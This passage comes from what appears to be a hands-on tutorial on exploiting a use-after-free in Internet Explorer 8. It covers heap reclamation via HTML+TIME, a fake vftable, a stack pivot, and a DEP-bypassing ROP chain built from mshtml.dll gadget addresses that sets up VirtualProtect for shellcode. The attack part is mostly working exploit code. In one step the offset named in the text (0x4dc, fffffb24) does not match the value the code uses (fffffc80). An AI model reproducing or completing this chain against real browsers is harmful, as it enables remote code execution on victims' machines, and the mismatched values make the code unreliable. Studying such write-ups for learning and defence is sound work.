Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.
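
For reference, its (simplified) documented prototype is:

LPVOID HeapAlloc(
  HANDLE hHeap,   // handle to the heap to allocate from
  DWORD  dwFlags, // allocation flags
  SIZE_T dwBytes  // number of bytes to allocate
);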

The first parameter is again a handle to an existing heap. The second is any flags you would like to set on the heap allocation. The third, and most important for us, is the actual size of the allocation. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger take over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!

This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!
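
A rough JavaScript sketch of that idea might look like the following (the element, the property used, and the way the string is built are assumptions for illustration; how IE8 stores the string internally ultimately determines the exact allocation size):

// Build data intended to land in the freed 0x68-byte chunk
var fill = unescape("%u4141%u4141");          // each %uXXXX contributes 2 bytes
while (fill.length < 0x68 / 2)
{
    fill += unescape("%u4141%u4141");
}
fill = fill.substring(0, 0x68 / 2);

// Assigning the string to a DOM element property forces the browser to
// place a copy of it on the heap
var el = document.createElement("div");
el.title = fill;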

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx], takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced at a specified offset into the virtual function table, and the resulting function pointer is called. Notice how currently we control the ECX register, which is used to hold the pointer to the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that were previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with enough entries to cover offset 0x70? What we could do is, with our primitive to control the vptr, replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 0x70 bytes worth of pointers (think of these as “fake functions”) and then have the vptr we control point to this fake virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, fetch whatever is at our fake virtual function table at an offset of 0x70, and invoke it! The goal from here is to construct our own vftable and to make the entry at offset 0x70 in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method simply to avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, the reallocation and reclaiming of freed memory is what makes use-after-frees more difficult to exploit. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially, what this HTML+TIME “method”, which only works for IE8, does is the following: instead of just placing 0x68 bytes of raw data into the freed chunk, which still results in a crash because we are not supplying pointers to anything, we can fill it with 0x68 bytes worth of pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is an alternative here, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities, how to determine the size of a freed allocation, and how to properly fill it. This specific technique is not applicable today either. However, this is the beginning of my learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now reclaimed this freed chunk with our user-supplied 0x68-byte allocation.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the member at offset 0x70 to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx]   ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]  ; This dereferences the virtual function table at an offset of 0x70 to fetch the target function pointer, and stores it in EDX
call edx       ; The function is called

So what happened here is that we loaded our heap chunk, which replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers, either to the fake virtual function table (the 1st pointer) or to the string “vftable” (the 2nd pointer and so on). This can be seen in the image below (in WinDbg, poi() will dereference what is within parentheses and display it).

The value ECX points to, our fake vptr, is also placed into EAX.

The value at EAX plus an offset of 0x70 is then placed into the EDX register, and that value is called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and since we control EAX, we can exchange the EAX and ESP registers to obtain stack control and begin a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known that IE8 contains some modules that are not subject to ASLR. For these purposes, this exploit will not take ASLR into consideration, but I hope that true ASLR bypasses through information leaks are something I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At this stage, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well-known fact that, when leveraging the Java Runtime Environment (version 1.6 to be specific), an older version of MSVCR71.dll gets loaded into Internet Explorer 8 that is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will instead disable ASLR system-wide and construct our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system-wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fill up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists.

Let’s update our POC with this ROP gadget, in place of the former 42424242 DWORD that served as our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable (0x70 bytes' worth of DWORD "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loop. Each ";vftable" string is appended after the longer 0x70-byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};
    }

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
</html>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall what was said earlier about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know the virtual function is indexed from offset 0x70. This doesn’t mean, however, that we are limited to 0x70 total bytes. The only limitation is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD created by the HTML+TIME method, which allocates 26 total DWORDS for a total of 0x68 bytes (104 in decimal), which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable (0x70 bytes' worth of DWORD "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack to our original xchg eax, esp instruction. Because of this, we will need to start our ROP chain after this pointer, since it has already been executed. This means that our ROP chain should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will continue to use WinDbg as our postmortem debugger for the time being, making changes to our ROP chain and then viewing the state of the debugger to see the results. When necessary, we will start with the parent Internet Explorer process, use WinDbg to identify the correct child process, and then debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable (0x70 bytes' worth of DWORD "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep performing returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090";             // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far is that this fake vftable will be loaded on the stack. When that happens, our original xchg eax, esp ; ret gadget will still be there, and we need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with a series of ret gadgets that lead to an eventual add esp, 0xC ; ret gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us that program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain from this point is the same process. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll, we can see there are two great candidates to get a stack address into EAX and ECX.

push esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, that the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, a return address gets pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we can simply add to ESP to essentially “jump over” the return address. Here is what this block of the ROP chain looks like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address from the previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our eventual call to VirtualProtect, which will mark the stack as RWX so we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We place the function call on the stack because we are performing this exploit on a 32-bit system. 32-bit Windows, as you may recall, uses the __stdcall calling convention by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.
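
To visualize what we are building toward, here is a hedged sketch of the stack layout we want at the moment of the final stack pivot into VirtualProtect (the concrete addresses get filled in by the arbitrary writes later in the chain):

// Hedged sketch of the target stack layout when the final xchg eax, esp ; ret fires. With __stdcall,
// VirtualProtect reads its four arguments directly off the stack:
//   ESP+0x00 -> address of kernel32!VirtualProtect    (the ret pops this into EIP)
//   ESP+0x04 -> fake return address                   (overwritten later with the shellcode address)
//   ESP+0x08 -> lpAddress                             (shellcode address)
//   ESP+0x0C -> dwSize                                (0x401)
//   ESP+0x10 -> flNewProtect                          (0x40, PAGE_EXECUTE_READWRITE)
//   ESP+0x14 -> lpflOldProtect                        (any writable address)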

After running the updated POC, we can see that we land on the 90909090 bytes, marked in the above POC as “Start ROP chain” (the last line of the snippet). Let’s check a few things out to confirm we are getting the expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by simply waiting until the third process is created before attaching! Each time we have executed the script, we have had a prompt asking us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, which will be the last process listed in WinDbg under “System order”.

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on the gadget that “jumps” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The first parameter placeholder, which holds an IAT entry pointing to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack address that points to the VirtualProtect parameter placeholder. This value is also copied into ECX via our previously used COP gadget. Then, the value in EAX is dereferenced, so EAX holds what the stack address points to (the VirtualProtect IAT entry). That IAT entry is dereferenced again to get the actual address of VirtualProtect into EAX. Finally, ECX, which still holds the stack address of the VirtualProtect parameter placeholder, is used with an arbitrary write gadget to overwrite that stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address that used to point to the parameter placeholder, now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also pad our ROP chain out to a static size (0x500 bytes’ worth of DWORDS) so the location of our shellcode on the stack stays consistent.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191"
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The rop variable is prototyped for 0x500 total bytes’ worth of gadgets and keeps track of each DWORD already placed on the stack, so the padding shrinks dynamically as more gadgets are used up. This lets us reliably calculate where our shellcode is on the stack without additional gadgets pushing the shellcode further and further down. The 0x16 in the for loop tracks how many gadgets (in hexadecimal) have been used so far, and every time we add gadgets we need to increase this number by the number of gadgets added. There are probably better ways to calculate this mathematically, but I am more focused on the concepts behind browser exploitation, not automation.
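
If you would rather not hand-maintain that constant, the DWORD count can be derived from the length of the rop string itself, since each unescaped DWORD contributes exactly two UTF-16 code units. This is only a hedged alternative sketch; the POC in this post keeps the manual constant.

// Hedged alternative: rop.length / 2 equals the number of DWORDs appended so far, so the padding
// needed to reach a fixed 0x500-byte ROP region can be computed without manual bookkeeping.
var totalDwords = 0x500 / 4;          // 320 DWORDs reserved for the ROP region
var usedDwords = rop.length / 2;      // DWORDs already appended to the chain

for (i = 0; i < totalDwords - usedDwords; i++)
{
  rop += "\u9090\u9090";
}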

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget to also increase the number used in our previous for loop by 4 more ROP gadgets (for a total of 0x1a, or 26). From here on out, it is expected that this number is increased to compensate for each additional gadget added.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in its negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes and would break our exploit. Instead, we leverage the negative representation of the value, which contains no NULL bytes, and we will eventually perform a negation operation on it.

So to start, let’s place into EAX this negative representation of the distance between the current value in ECX (the stack address that points to 11111111, our parameter placeholder for the return address) and our shellcode location (91919191).

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX
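
As a quick sanity check on these encodings, the two's-complement value for any small positive offset can be computed directly. This is just a hedged helper sketch for verifying values like the ones above; it is not part of the exploit itself.

// Hedged helper: compute the NULL-free two's-complement (negative) encoding of a positive offset.
// The neg eax gadget reverses this at runtime, recovering the original offset in EAX.
function negativeDword(offset)
{
  return (0x100000000 - offset).toString(16);   // e.g. negativeDword(0x4dc) === "fffffb24"
}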

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get the distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address from the previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX currently holds the address of the parameter placeholder for our return address, which was the base address used in our calculation of the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits the pop eax ; ret gadget first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX (the distance from the return address placeholder to our shellcode) to EAX, which leaves EAX holding the stack address that points to the beginning of our shellcode. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address of the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location by 4 bytes so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse it!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
